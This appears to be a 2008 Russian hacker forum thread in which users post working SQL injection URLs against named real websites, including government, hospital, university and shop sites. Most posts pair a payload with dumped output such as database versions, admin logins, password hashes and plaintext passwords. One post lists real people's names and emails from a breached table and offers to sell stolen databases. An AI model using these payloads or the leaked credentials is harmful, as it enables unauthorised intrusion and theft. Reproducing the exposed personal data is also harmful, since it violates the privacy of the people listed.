1+UNION+SELECT+1,2,3,4,5,6,VERSION()+from+login/*
В Антибояне нет, что странно... PR 6.

.acme

29.04.2008, 19:31

А®ТеS, чуве, http://forum.antichat.ru/showpost.php?p=493477&postcount=3513

neon_fx

29.04.2008, 22:23

http://www.fzsk.gov.cn/show.php?id=182+or+1=@@Version
http://www.lfsfda.gov.cn/show.php?id=262+and+1=@@Version

MaZaHaKer

29.04.2008, 23:36

http://www.flagman.kiev.ua/pub/view.php?pid=0x3127%20union+select+1,2,3,4,concat_ ws(0x2F,version(),database(),user()),6,7,8,9,10/*

neon_fx

30.04.2008, 01:20

http://www.flagman.kiev.ua/pub/view.php?pid=0x3127%20union+select+1,2,3,4,concat_ ws(0x2F,version(),database(),user()),6,7,8,9,10/*

http://forum.antichat.ru/showthread.php?p=595597

Dr.Frank

30.04.2008, 08:20

Проститутки:
http://putana.nu/list.php?link=-35532+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat (login,0x3a,pass,0x3a,email),30,31,32,33,34,35,36, 37,38,39,40,41,42,43+from+users+limit+3001,1--

Данные выводятся в анкетных данных слева, под тарифами.

А®ТеS

30.04.2008, 13:43

2.acme в http://filefront.jino-net.ru/sql.html нету, искать по теме (которая разрослась на ~550 страниц) сидя на диалапе сложно :(.
Опять же в антибояне нету:

http://www.hellenicathletes.com/news.php?news_id=-1+UNION+SELECT+concat(email,0x3a,password),2,3,4,5 ,6,7,8,9,10,11,12,13+FROM+hellenic_main.powerUsers/*
http://www.repower5m.com/news_uk.php?news_ID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9/*
http://www.bnhhospital.com/show_news.php?news_id=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9,10,11,12, 13,14/*

MaZaHaKer

30.04.2008, 14:38

http://www.flagman.kiev.ua/pub/view.php?pid=0x3127%20union+select+1,2,3,4,concat_ ws(0x2F,version(),database(),user()),6,7,8,9,10/*

4.1.22/flagman/u_flagman@localhost

V.I.P

30.04.2008, 20:20

Сайт:www.bazarinfo.com

Инфа: Газета объявлений

SQL-Inj: http://www.bazarinfo.com/view.php?page=1&id=-14+union+select+1,2,3,4,5,6,7,8,9/*

---------------------------------------------------------------

Сайт: www.nationalassembly.af

Инфа: Национальная асамблея Авганистана.

SQL-Inj: http://www.nationalassembly.af/index.php?id=99+union+select+version(),2,3,4,5,6,7 ,8--

Ну и так Скули на некоторых сайтах,небыло времени их раскрутить.

http://www.script.com.ua/comments.php?s=news&id=115'

http://www.g-models.com/foto.php?id=1'+order+by+1/*&i=6

http://www.desktopsidebar.com/ffdetails.php?id=161'+order+by+14/*

Велемир

30.04.2008, 20:42

http://www.sticker.su/forum.php?sub_topics=true&main_topic_id=1'+union+select+concat_ws(0x3a,login ,password,email),2,3,4+from+forum_users+limit+1,1/*

Не наю, было это или нет,чел нашёл уязвимый сайт:Р.Ни могу понять,почему пишет,что количество столбцов левое, ибо ордер бай выдаёт 4 о_О.Таблицу и поля вручную подогнал.Мошь выведет кто о_О.

~!DoK_tOR!~

30.04.2008, 22:36

dailybeacon.utk.edu

http://dailybeacon.utk.edu/showarticle.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,1 1,12/**/from/**/mysql.user/*

root:49c206e707168c98

SWAT

01.05.2008, 02:00

http://www.gamershood.com/game.php?id=769+and+1=2+union+all+select+1,2,conca t(username,char(58),password),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17+from+user+where+userid=21000--

MaZaHaKer

01.05.2008, 09:09

_http://oke.ru/xo4u.php?id=-42708'+union+select+1,2,3,4,5,6,7,8,9,10/*

diznt

01.05.2008, 15:31

Помогите с иньекцией ниче не получаеться http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*

.acme

01.05.2008, 16:41

http://www.atrium-centr.ru/ncatalog/?id=80&position=-1078+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,concat_ws(0x2,version(),data base(),user()),23,24--

version: 4.0.24_Debian-10sarge1
bd: atrium
user: root@localhost

admin: login: admin
pass_hash: 74aff5cad73b7d1b587fe5a4fe5288d8

mysql.user:
1. root 001c591f0180a0db
2. root 404a5bc542945739
3. sys 42317d1c50e8dbb6

~!DoK_tOR!~

02.05.2008, 01:00

http://www.vlankas.ru/~bark/modules/myarticles/topics.php?op=listarticles&topic_id=-2%20union%20select%201,2,concat_ws(0x3a,uname,pass ),4,5,6%20from%20runcms_users+limit+0,1

itman:bfc4c35ff54e5ff14f899eaf0b312d0c

http://www.cumaroua.net/index.php?option=com_jooget&Itemid=1&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0 ,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*

admin:dc85333ba761e84fc1becd24397ba39e

l1ght

02.05.2008, 11:30

краткий обзор багов гохи:
1) посимвольный брут с этого нс:
http://wow.ru/c/pagecont/?id=2241+and+ascii(lower(substring(user(),4,1)))%3 C=97
1-103 g
2-111 o
3-104 h
4-97 a
5-95 _
6-103 g
7-111 o
8-104 h
9-97 a
10-115 s
11-64 @
12 49 1
...
2)reverse-ip=>
http://news.goha.ru/c/pagecont/?id=2217+order+by+4/*
-//-
3)однако, есть и не посимвольный брут, причем где то ковычки фильтруются:
http://eq2.goha.ru/c/pagecat/show_image/?action=show_image&id=999+union+select+load_file('/lala'),2,3,4+from+information_schema.tables/*
4).. а где то нет:
http://www.list.goha.ru/suggest-link.php?id=0'+union+select+1,load_file('/lala'),3,4,5,6,7,8,9,10,11,12,13,14,15/*
или даже так (вывод в исходниках):
http://eq2.goha.ru/c/pagecat/show_image/?action=show_image&id=999+union+select+concat(0x3b,table_name,table_s chema),2,3,4+from+information_schema.tables/*
6)причем бага с посимвольным брутом распостранена на нескольких ресурсах гохи:
http://lineage2.ru/c/pagecont/?id=2761-1
сколько акков с оффа можно увести, получив доступ к личкам пользователей - решать вам, и помните о неправомерном доступе к закрытой информации=).

Велемир

02.05.2008, 20:16

Лично меня с лайнэйдж редиректит =)

http://lineage2.ru/c/pagecont/?id=2760+and+substring(version(),1,1)=5

А вот:Р

http://lineage2.ru/c/pagecont/?id=2760+or+2760=if(ascii((select+user()))>=254,1,0,benchmark(2999999,md5(now()))

Если вместо 254 вписать 280 или больше всё равно возвращает 1,или запрос непральный,бес понятия)

http://lineage2.ru/c/pagecont/?id=2760+order+by+4/*

http://lineage2.ru/c/pagecont/?id=2760+union+select+1,2,3,4/*

Фильтрация или запрос неверный)

http://lineage2.ru/c/pagecont/?id=2760+union+select+0x277461626C655F6E616D6527,2 ,3,4+0x66726F6D+information_schema.tables/*

Чойто не выходит: )

neon_fx

03.05.2008, 00:23

http://www.ufsa-tour.com.ua/news.php?news_id=-17+union+select+1,2,3,concat_ws(char(58),version() ,user(),database()),5,6/*

4.1.22-standard-log
ufsacom_usrufsa3@localhost
ufsacom_ufsa3

//*************************************
Страховая компания ВЕСКО
http://vesko.com.ua/news.php?news_ID=-328+union+select+1,2,user(),4,5,version()/*

4.1.22-log
news@hosting02.iptelecom.net.ua
news

//*************************************
http://www.bumexpress.com.ua/news.php?news_id=-122+union+select+1,2,user(),4,5,6,7,8,9,10,11/*

4.1.22
bumexpress@localhost
bumexpress

//************************************
http://kompan.altercon.com.ua/news.php?news=2&news_id=-3+union+select+1,user(),3,4,version(),6,database() ,8/*

4.1.22-log
altercon_det@viper
altercon_det

//************************************
Отель "РУСЬ" Киев
http://www.hotelrus.kiev.ua/ru/information/news/news.php?news_id=-2+union+select+1,user(),3,version(),5,6,7/*

5.0.22-standard
droopy_hotelrus@localhost
droopy_hotelrus

Блин в 12.00 вырубят инет
кому надо держите
http://www.master-stroy-yug.com.ua/news.php?news_id=22+order+by+1/*

http://www.cpc.com.ua/rus/news.php?news_id=11+order+by+100/*
не серчайте на меня за офтоп плиз

Славная сегодня была охота

Nekt

03.05.2008, 02:28

http://www.master-stroy-yug.com.ua/news.php?news_id=22+union+select+1,user(),version( ),4,5,6/*
админка тоже есть, но она походу пишет и взаимодействует с файлами а не базой..
5 ветка.

http://encycl.anthropology.ru/article.php?id=-1+union+select+1,user(),version(),database(),5,6,7 ,8,9,10/*
5 ветка

http://www.mtas.ru/second.php?ID=-15+union+select+AES_DECRYPT(AES_ENCRYPT(version(), 0x71),0x71)/*
5 ветка

http://www.ciritas.ru/product.php?id=-2+union+select+1,2,3,4,version(),6,7,8,9/*
fадминка по ходу дело с базой повязана
4 ветка

http://www.clasp.org/publications.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15/*
первая версия 4 ветки кажись, дальше крутить охоты нету..

http://www.fondationbrigittebardot.fr/site/homepage.php?Id=2+union+select+1/*
фильтрация
http://www.gregorypacks.com/prod.php?ID=-2+order+select+1/*
здесь полная фильтрация.. Жесть :(

http://www.eutrainingsite.com/open_details.php?id=2+group+by+55/*
не столько терпелив.. Думаю кому-нить пригодиться . ;)

.acme

03.05.2008, 11:05

Извиняюсь за оффтоП, но
mtas.ru
encycl.anthropology.ru
ciritas.ru
clasp.org
fondationbrigittebardot.fr
gregorypacks.com
eutrainingsite.com

Баян. Юзайте поиск.

.acme

03.05.2008, 15:14

Мелочевка.

hadouken!
http://www.hadouken.co.uk/category.php?categoryID=-1+union+select+1,2,concat(user(),0x2,database(),0x 2,version()),4,5,6,7--
user: uk_hadoukenUser@unity-apache2
db: uk_hadouken
version: 4.0.14-Max-log

panelmonkey.org
http://www.panelmonkey.org/background.php?id=-7+union+select+1,concat(user(),0x2,database(),0x3, version()),3,4,5,6,7--
user: dbo113074304@74.208.16.39
db: db113074304
version: 4.0.27-max-log

bitdefenderthailand.com
http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,unhex(hex(concat(user(),0x2,da tabase(),0x2,version()))),4,5,6,7,8,9,10--
user: amphonet_priy@localhost
db: amphonet_bitdefender
version: 5.0.22

http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(TABLE_NAM E,0x2,COLUMN_NAME))),6,7,8,9,10+from+INFORMATION_S CHEMA.COLUMNS+where+COLUMN_NAME+like+'login'--

http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(user_id,0 x2,company_name,0x2,address,0x2,company_phone,0x2, contact_person,0x2,password))),6,7,8,9,10+from+dea ler--

samarin

03.05.2008, 17:30

Веломаг

http://veliki.ru/shop/show_cat.php?grid=-10%20union%20select%201,2,3,version(),5,6/*
http://veliki.ru/shop/show_cat.php?grid=-10/**/union/**/select/**/1,2,3,concat_ws(0x3a,username,passwd),5,6/**/from/**/user/*

http://veliki.ru/shop/show_cat.php?grid=-10/**/union/**/select/**/1,2,3,concat_ws(0x3a,username,password),5,6/**/from/**/admin/*
ну а вот и админ

veliki:5d0c553853953d3b

Серенький

03.05.2008, 22:27

autolider.infohttp://www.autolider.info/news/main.php?id=203&cpage=1&id_rub=-4+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,us ername,user_password,user_email,user_level),7,8,9, 0,1,2+from+phpbb_users+where+user_level=1/*

--

http://china-trex.ru/index.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,concat_ws(0x203a20,id,name,psw,access,email,nic ),0,1,2,3,4,5+from+admins+limit+1,1/*

cash$$$

04.05.2008, 01:22

http://www.cedarcityreview.com/articles.php?id=99999+union+select+1,VERSION(),3,4 ,5,6,7,8,9,10,11,12,13,14/*

VERSION: 5.1.22-rc
USER: cedarv_user@localhost
DATABASE: cedarv_omnibus

Fuckel

04.05.2008, 18:26

2 Nekt
Боян, ниче там не фильтруется и не жесть никакая, читай мануалы
http://www.gregorypacks.com/prod.php?ID=-1+union+select+1,2,3,concat_ws(0x3C62723E,DATABASE (),VERSION(),USER()),5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52+--+

попугай

04.05.2008, 21:54

Что скажете насчет этого -
http://sexnos.ru/registration.php

В форме ввода пароля, если ввести "> то выдает ошибку что то с датой связонное с запросом..

пробовал запросы состовлять -но ничего путного не вышло... Можно как то расковырять?

truelamer

04.05.2008, 22:05

http://www.suncity.kiev.ua/index.php?id=90+and+lower(substring(version(),1,1) )=4&lang=en

Слепая четвертой версии, кто хотит раскручивайте)))
==============================================

http://www.balaklawa.com/static.php?code=-1+union+select+1,version(),3--&lng=en

5 версия, лажа, ничего интересного в таблицах

Ponchik

05.05.2008, 08:00

magic-shop.ru
первый магазин фокусов и иллюзии
1 фокус показываю я Ж)
http://www.magic-shop.ru/?action=product_view&id=-1'+UNION+SELECT+1,2,concat_ws(0x3a,VERSION(),USER( ),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42/*
4.1.20-1.gms:w_magics@195.42.160.22:w_magics
Ничё подобрать не получилось но лучше так чем никак, мб там префикс т.к. новости на сайте есть а таблы news нету, ну мб она называется nowosty Ж)

SWAT

05.05.2008, 15:04

http://www.handshake.in/browse.videos.php?category=-1+union+all+select+1,2,3,concat(admin_username,cha r(58),admin_password),5,6,7,8+from+joovili_admins/*

и админка
http://www.handshake.in/admin/login.php
admin:admin

http://www.hostreward.com/directory.php?ax=list&sub=7&cat_id=-1+union+all+select+1,2,concat(id,0x3a,name,0x3a,em ail,0x3a,password),4,null,null,7,8,9,10,11,12,13,1 4+from+links--

CaNNabi$

05.05.2008, 17:38

www.mt8.ru
http://www.mt8.ru/index.php?action=product_view&id=0x3127%20union+select+1,2,concat_ws(0x3a,VERSIO N(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39/*
4.0.25-log:medtehni@dux.hc.ru:wwwmedtehnika8ru

www.bestwine.ru
http://www.bestwine.ru/index.php?action=product_view&id=0x36383327%20union+select+1,2,concat_ws(0x3a,VE RSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38/*
5.0.45-log:u93285@10.10.153.168:u93285

www.alcotrade.ru
http://www.alcotrade.ru/index.php?action=product_view&id=0x342733383638%20union+select+1,2,concat_ws(0x3 a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38/*
4.1.22-standard-log:interdes_alcotra@localhost:interdes_alcotrade

maxster

05.05.2008, 19:32

www.autovista.ru
http://www.autovista.ru/spy/publish.php?id=-111+UNION+SELECT+email,password,3,4+from+shop/*

truelamer

05.05.2008, 19:36

http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+@@version)--

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4

system_user:nmr

http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+top+1+table_n ame+from+information_schema.tables+where+table_nam e+not+in('UpperMenu4','delete_sektor_issues2','AN_ Issues','sektor_issues','Calendar','Accreditation' ,%20'Accreditation_events',%20'Accreditation_showd ata',%20'Accreditation2',%20'AN_Authors',%20'AN_El ements',%20'Banner',%20'BLOG_ANSWERS','BLOG_COMMEN TS',%20'BLOG_POLLS','BLOG_RESULTS','BLOG_SETTINGS' ,%20'BLOG_USERS','BLOG_WEBLOG','Calendar_Informati on'))--

нашли табличку BLOG_USERS, копаем её......

http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+top+1+column_ name+from+information_schema.columns+where+table_n ame='BLOG_USERS'+and+column_name+not+in('id','uFUL LNAME','uUSERNAME','uPASSWORD','uEMAIL','uDATECREA TED'))--

http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+top+1+cast(uU SERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(uPASSWORD+ as+nvarchar)+from+BLOG_USERS)--

целый один пользователь)))):

login:sws
pass:zzeeuuss

samarin

05.05.2008, 23:07

www.intone.ru - полифония,реалтоны и т.д на мобильники

http://www.intone.ru/get2.php?partner=269&id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29/*

5.0.26-log
jgamesru_int@localhost
jgamesru_int

KPOT_f!nd

05.05.2008, 23:19

http://www.chessbase.com/shop/product.asp?pid=1%20or%201=(SELECT+TOP+1+COLUMN_NA ME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAM E='cbuser'+AND+COLUMN_NAME+NOT+IN+('newsid','ID',' Name','PW'))--

SWAT

06.05.2008, 00:10

http://www.fifacz.com/index.php?news_id=-9999+union+all+select+1,2,concat(user_name,char(58 ),user_password),null,5,6,7,null,9,10,11,12,13+fro m+users--

http://www.velosaddles.com/products.php?cat_id=-1+union+all+select+1,2,null,4,5,concat(username,ch ar(58),password),7+from+logins/*

http://giftman.ru/news_view.php?news_id=-9999+union+select+null,null,null,concat_ws(0x2A,lo gin,pwd_hash,email),null,null,null+FROM+u15364.ra_ users/*

MaSter GeN

06.05.2008, 14:44

1.http://www.sanza.co.uk/apps/shop/shop.asp?sc_Id=522 or 1=@@version--
1.Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack
2.http://www.sanza.co.uk/apps/shop/shop.asp?sc_Id=522 or 1=(select db_name())--
2.'sanza'
3.http://www.sanza.co.uk/apps/shop/shop.asp?sc_Id=522 or 1=(select system_user)--
3. 'SYNERGY1\IUSR_SYNERGY1'

-=megahertz=-

06.05.2008, 15:47

http://www.reasonmusic.ru/modules/articles/article.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*
кому не сложно киньте админ пароли в ЛС за +++++:)
версия БД 5.0.26

-=megahertz=-

06.05.2008, 21:53

http://www.medicina-kiado.hu/index.php?menu=search&bookcateg=-61+UNION+SELECT+1,2,ID+from+medicina_users+limit+0 ,1/*
Version - 5.0.44

-=megahertz=-

06.05.2008, 22:19

AOECS - Association of European Coeliac Societies
http://www.aoecs.org/news/list.php?type=-1+UNION+SELECT+1,2,version(),concat(id,0x3a,userna me,0x3a,password),5,6,7,8+from+users+limit+0,1/*
version - 4.1.22
ID - 1
USER - andre
PASSWORD - f1350498f018141b526a8e26a0114b54 (twistees)

КВР

07.05.2008, 17:16

из новостей:
Microsoft начала переговоры о возможном слиянии с американской медиакомпанией AOL LLC
aol.com
_http://ted.aol.com/
category.php?catID=999999+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10,11,12,13,999,15,16,17,18,19,20,21,22,23/*
_http://ted.aol.com/authors.php?authorID=999+UNION+SELECT+1,2,3,CHAR(1 04,97,99,107,51,100),5,CHAR(104,97,99,107,51,100), 7,8/*

neon_fx

07.05.2008, 17:20

Всё )
aol.com
_http://ted.aol.com/category.php?catID=999999+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10,11,12,13,999,15,16,17,18,19,20,21,22,23/*
_http://ted.aol.com/authors.php?authorID=999+UNION+SELECT+1,2,3,CHAR(1 04,97,99,107,51,100),5,CHAR(104,97,99,107,51,100), 7,8/*

Добавочка
user-tedshead_user@205.188.130.11
version-4.1.14-standard-log
database-tedshead

//Блин в армию забирают :(

†c0(aIn?†

09.05.2008, 11:07

Парни,вот вам шоп,развлекайтесь:

http://vum.kostanaylife.kz/index.php?id=-17+union+select+ 1,2, 3,4,5,6/*&salerid=0

db name: t314kz_dbKLNew
user: t314kz_studior@localhost
version: 4.1.22-log

ЗЫ: мой первый пост)

tappakah

09.05.2008, 16:06

http://www.bestwine.ru/index.php?action=product_view&id=0x36383327+UNION+SELECT+1,2,username,4,5,6,7,8, 9,user_password,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+ from+phpbb_users+limit+1,1/*

Если кто нибудь разбрутит пасс ОдМИНА напишите ЛС плс ))

Muhacir

09.05.2008, 18:51

http://www.timeoutistanbul.com/index.php?eid=18365+order+by+3/*

http://www.timeoutistanbul.com/index.php?eid=18365+union+select+0,1,2,3+from+user s/*

:confused:

neon_fx

09.05.2008, 23:19

Пейте соки Сандора

http://www.sandora.ua/index.php?id=-6+UNION+SELECT+1,2,database(),4,5,6/*
sandora
sandora@localhost
4.1.22

Apache/2.0.59
FreeBSD
PHP/4.4.8
mod_ssl/2.0.63 OpenSSL/0.9.7e-p1

diznt

09.05.2008, 23:44

http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
Помогите я узнал токо имена таблиц больше ничего не могу почему то сделать. требуеться пасс,хеш админа

Gorev

10.05.2008, 00:01

2 diznt

http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 , 16,table_name,18+from+information_schema.tables+li mit+1,1/*
takim je makarom iuzae6 information_schema.columns
i vse tip top :)))

Muhacir

10.05.2008, 00:06

http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
Помогите я узнал токо имена таблиц больше ничего не могу почему то сделать. требуеться пасс,хеш админа

http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(v ersion(),0x3a,user(),0x3a,database()),14,15,16,17, 18+from+users/*

переберай колонки

типо

user
pass

Gorev

10.05.2008, 00:08

2 Muhacir preamo lojkoi v rot...pust' dumaet sam..pro limit i pro vse 4itaet

diznt

10.05.2008, 00:52

Gorev просто хотябы сказать мне какие приблизительно колонки перебирать дальше я сам ))) Muhacir . вообщем спсп обоим

Gorev

10.05.2008, 00:57

2 dizn ti limit poiuzai i vibirai sam columns kakie tebe nujni...no obi4o id, name, pass ili username,password,login etc.....zapros delae6 primerno takoi
http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 , 16,column_name,18+from+information_schema.columns+ where+table_name=(tablitza kotoraya interesuet)+li mit+1,1/* dalshe igraisea limitom meneay zna4enie pervoi tzifri

diznt

10.05.2008, 01:01

щя заюзаем

Gorev

10.05.2008, 01:04

imea tablitzi vozmojno nado budet v sql hex peredelivati http://x3k.ru/ tut naide6....vse prosto

†c0(aIn?†

10.05.2008, 14:10

http://www.fastcasual.com/research.php?rc_id=4+uni on+select+1,2,3,4,5--

atmmarketplace@localhost
sitedb
5.0.22

http://www.fastcasual.com/research.php?rc_id=4+uni on+select+1,2,3,4,5--
atmmarketplace@localhost
sitedb
5.0.22

KPOT_f!nd

10.05.2008, 18:34

http://www.pharma-id.com/thedirectory/profile.asp?id=1+or+1=(SELECT+TOP+1+pName+from+tbl WebsiteUsers)--
так же можно подставить: pPassword, pEmail, pName

http://www.zaishu.com/shop.php?id=-17+union+select+1,2,3,username,password,6,7,8,9,10 ,11,12,13,14+from+adminrights/*
admin:zaishu62

159932

10.05.2008, 19:27

www.worgas.it
http://www.worgas.it/products.php?id=-13+union+select+concat_ws(0x3a,username,password,e mail_address),2,3+from+clienti/*
http://www.worgas.it/products.php?id=-13+union+select+concat_ws(0x3a,username,password,e mail_address),2,3+from+rc_users/*
===============================================
scuoladott.psy.unipd.it
http://scuoladott.psy.unipd.it/news.php?id=-12+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,usern ame,password),9,0,1,2,3+from+percez_cal_users/*
http://scuoladott.psy.unipd.it/news.php?id=-12+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,usern ame,password),9,0,1,2,3+from+pscbio_cal_users/*
это вроде админы - но где админка - ???
admin:adm1n
campana:g1anlu
agrillo:chragri
===============================================
http://www.freeinfosociety.com/site.php?postnum=460'+and+1=0+union+select+1,2,con cat(name,0x3a,password),4+from+users/*

Gorev

10.05.2008, 20:37

http://www.pro-science.asm.md/?lang=ro&view_ev&ev=-90+union+select+1,2,3,4,5,6,7 ,8,9 /*

version() -5.0.32-Debian_7etch5
database()-proscience
user()-
proscience@localhost

dal6e bilo v lom razvivat'....

Gorev

10.05.2008, 20:40

http://www.vreaucredit.md/test/bank_info.php?bank_id=-99999+union+select+1,2,3,4,5,6 ,7,8,9,0/*
user()-17447@localhost
version () -5.0.27
database() -17447
information_schema.tables prisutstvuet...

S00pY

10.05.2008, 21:17

http://www.millennium.net.ua/catalog/?id=-1+union+select+concat(name,':',passwd)+from+users+ limit+0,1/*
http://www.millennium.net.ua/admin/login.php
artem:vfkmdbyf

SWAT

10.05.2008, 22:21

http://www.eastsidehockeymanager.net/news.php?view=news&gid=24&id=1261+and+1=2+union+all+select+1,2,concat(user,c har(58),password),null,5,null,null,null,null,null, 11,null,13,null+from+mysql.user--

http://www.bccracunari.com/katalog/detail.php?id=968+and+1=2+union+all+select+1,2,3,c oncat(username,char(58),password),5,6,7,8,9,10,11, 12+from+user--

http://job.zp.ua/vip.php?id=2+and+1=2+union+all+select+1,2,3,4,conc at(login,char(58),passw),6,7+from+admin--

http://www.iteforum.com/sell.php?id=179182+and+1=2+union+all+select+1,2,3, 4,concat(username,char(58),password),6,7,8,9,10,11 ,12,13,14+from+users--

Gorev

11.05.2008, 00:12

http://www.mobilevideonet.com/site/index.php?onderdeelID=1&paginaID=1&itemID=-141+union+select+1,2,3,4,5,6,7,8,9,table_name,1,2, 3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0+from+information_schema.tables+limit+50,1/*

http://www.mobilevideonet.com/admin

table_name : m_admin
columns : username, password
go go go....

Gorev

11.05.2008, 00:30

http://www.wallpapervillage.com/wallpaper.php?wallpaperid=-21683+union+select+version(),2,3 ,4,5,6/*

S00pY

11.05.2008, 12:07

http://mirlestnic.mirlestnic-vrn.ru/site.php?id=-1+union+select+user(),version(),3,database(),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

Gorev

11.05.2008, 12:08

http://www.fertiligene.com/page.php?coul=1&pos=4&pos2=1&idproduit=-150+union+select+table_n ame+from+information_schema.tables+limit+1,1/*

takje iuzaite information_schema.columns i budet vam s4ast'e..i ne zabivaite pro limit..

159932

11.05.2008, 14:20

Zircool ЧИТАЙ правила !!!
http://forum.antichat.org/showpost.php?p=171306&postcount=1

samarin

11.05.2008, 16:21

http://omk.ru/ru/press/news/index.php?id9=1172+AND+NEWS.VERSION=0+AND+NEWS.LAN G_ID=1+and+substring(version(),1,1)=%223%22

version: 3.23.58
user: omk

хм.. впервые встретил третью версию. :)
Хотелось бы с ней поекспериментирвать, но никакого намека на таблицы не встретил :(

xena-mil1

11.05.2008, 17:51

http://www.itsecurityportal.com/itsecurity_job_detail.asp?jobid=111+and+1=@@versio n

добавлю

Xena Military private sql injection Exploit version 2.0

SQL Injection Private Exploit

System user: DED296\IUSR_DED296
Database name: SecurityPark
Server name: DED296
IS Sysadmin ? : 0
User databases number: 26
User tables count in curent DB: 80
Permission to create tables: Yes
SQL Server version: 2000
Windows version: 2003 SP1

Database: SecurityPark Table: arenatb_register

records:6681

registerid(int) name(varchar) company(varchar) email(varchar)
4598 Lucian Salsa lucian.oana@gmail.com
6009 jim scharff Access Management Systems Limi jim.scharff@amsgroup.uk.com
1518 Jacki Massaro ADLT Jacki_Massaro@ADLT.com
1634 Dzmitry Naumovich JV "UNIBELUS" ltd terra@unibelus.com
2696 Zulkafli BNM zulkafli@bnm.gov.my
6443 Joe Morris Riggs Bank jmorris@usa.net
3302 Wayne Allen Easy-Sec info@easy-sec.co.uk
2512 Laurie Wignall Wincanton Ltd laurie@eurolog.org
3861 marton yona rafael jonam@rafael.co.il
5017 Christine Geovision christine@geovision.com.tw
2597 Boulgouris boulgouris@tee.gr
4420 Gaurav Inurface Solutions raheja_1_gaurav@rediffmail.com
5122 bob jones webmaster@interproach.com
716 John Camilleri EAGLE SECURITY SYSTEMS info@eaglesecurity.org
18 Andy Short Farsight Ltd andy_short@farsight.co.uk
1322 kenny visionlinkplus ltd kenny.mckaig@visionlinkplus.co
1046 russell 121 fire and security russell@121security.freeserve.
6484 Paul Smith J P Alarms j.paul@jpalarms.co.uk
5394 barnet barnet4444@yahoo.com
3848 mark frost NetApps mark.frost@netapp.com
5220 Jonathan Leason Dictator Engineering Ltd j.leason@dictatordirect.com
459 Darren Chalmers-Stev VERITAS Software Ltd darren.chalmer-stevens@veritas
4930 paul wellfair pwellfair@uk2.net
2734 Talboom GIMV elinet@gimv.be

P.S. Елси найдете инекцию в ASP на серезном сайте можете стучать в асю, когда вытянем и продадим базу $ 50/50 .

icq 2617 ( 6 ) 1574

BlackSun

11.05.2008, 21:38

http://artnow.ru/requestprice.php?picture_id='+union+select+0,conca t(id,char(58),login,char(58),email,char(58),pswd,c har(58),is_user),2,3,4+from+_user+where+email='inf o@artnow.ru'/*

http://laptopik.ru/catalog.php?id1=-1+union+select+0,1,2,3,4,5,6,7,8,9/*
